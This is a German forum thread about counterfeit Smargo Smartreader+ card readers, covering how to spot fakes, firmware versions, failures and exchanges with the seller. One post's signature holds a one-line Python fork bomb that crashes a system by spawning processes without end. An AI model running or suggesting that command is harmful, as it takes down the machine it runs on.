Achtung! FAKE Smargo Smartreader+ im Umlauf!

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • so leute auch ich hatte gestern einen Briefumschlag von Satellitenwelt nachhause geschickt bekommen. Tatsächlich befand sich da eine neuer Smargo mit der 1.3 Version. Somit belass ich das mal so und nutze ihn weiter mit der Version. Mal schauen was in Zukunft kommt.
    • Original von arianebox
      ja aber erst mit 1.4 kann man die smargos auch per namen ansprechen anstatt dev/irgendwas, was sich nach reboot geänert haben kann.


      is zwar grad irgendwie off-topic:
      Gibt´s da ein FAQ oder ein TUT zu?

      Das ist natürlich dann schon net schlecht!
    • Ich habe von Satellitenwelt 2 Smargos bestellt - einen August 2008 und einen Dezember 2009 - beide sehen gleich aus aber laut den Bildern Fake.

      Stellt sich nur die Frage ob es 2008 auch schon Fakes gab ?

      Ich hab bis jetzt noch nichts unternommen da beide im Einsatz sind was meint ihr?

      Gruss RiMiGal
    • Original von pinhead
      Original von arianebox
      ja aber erst mit 1.4 kann man die smargos auch per namen ansprechen anstatt dev/irgendwas, was sich nach reboot geänert haben kann.


      is zwar grad irgendwie off-topic:
      Gibt´s da ein FAQ oder ein TUT zu?


      im file
    • Trotzdem sehr seltsam . Hab einen Fake und einen Original und beide laufen mit 1.3 , 1.4 und 1.5 ....
      Zitat von oZxS : benutzt das unstable und macht

      opkg install newnigma2-smargo

      viel einfacher so *g*

      Haben wir dann ein grafisches Plugin oder wie ? Finde nirgends etwas darüber .
      Kann alles , weiß alles und mache alles :pleased2:
    • Original von Kartenzwerg7
      Trotzdem sehr seltsam . Hab einen Fake und einen Original und beide laufen mit 1.3 , 1.4 und 1.5 ....
      Zitat von oZxS : benutzt das unstable und macht

      opkg install newnigma2-smargo

      viel einfacher so *g*

      Haben wir dann ein grafisches Plugin oder wie ? Finde nirgends etwas darüber .


      Für ne einmalige einstellung ein plugin :2Guns: :2Guns:
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • oZxS möchte damit sagen, dass beim unstable NewNigma auch der Fake Argolis im Nomal mode problemlos von Oscam erkannt wird.
      Das ist übrigens auch meine Beobachtung gewesen, aber trotzdem kann es das nicht sein.
      Meine Fake Smargos habe ich jetzt eingeschickt zum Tausch.
    • Die Fake-Smargos werden klar erkannt und laufen, auch ohne das Paket.
      ...aber es kommt zu häufigen Neuinitialisierungen der Karte und somit zu Abbrüchen beim Schauen....kann man z.B. bei der CCcam im webif wunderschön beobachten!
    • Moinsen,
      problemlos wurde letze Woche der kostenlose Umtausch beendet.
      Ein SmartReader MaxDigital 1.4 befindet sich jetzt im Einsatz.

      Geiz ist zwar Geil aber nicht immer hilfreich im I-Commerz.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von trulli ()

    • Am Dienstag sind meine beiden Smargos auf die Reise per Einwurfeinschreiben gegangen, heute habe ich zwei neue von Sat-Welt bekommen. Jetzt wohl ok. War 1.03 drauf und ich habe erst mal frech 1.04 drübergebügelt. Ich hoffe die halten jetzt durch.
    • meine 4 smargos sind auch flöten gegangen , werden keine karten mehr erkannt die sind knappe 6monate alt.. ********* wird die ersetzen...

      habe schon 1.05 drauf gehabt selbe resultat ...der smargo geht nach 1-2 wochen kaputt... erkennt nur ein teil des ATRs der karte ...

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von yasar ()

    • Original von yasar
      meine 4 smargos sind auch flöten gegangen , werden keine karten mehr erkannt die sind knappe 6monate alt.. ********* wird die ersetzen...

      habe schon 1.05 drauf gehabt selbe resultat ...der smargo geht nach 1-2 wochen kaputt... erkennt nur ein teil des ATRs der karte ...


      Und, hast Du geprüft, ob es Clones sind ?
      Wenn ja, was sagt Dein Lieferant / Händler ?
    • RE: smargo fakes

      So, ich habe einen FAKE Smargo der defekt war weg geschickt. Als der neue da war, sehe da original Gehäuse aber der Aufkleber ein FAKE. Habe einen originalen da um es zu vergleichen. Also das Spiel geht weiter ....:(

      Der Aufkleber ist nur zwei farbig. (silber und schwarz)
      Das original ist auch silber und schwarz aber das "+" Zeichen und die Buchstabe X bei MAXDIGITAL ist ROT !!!!

      Naja .....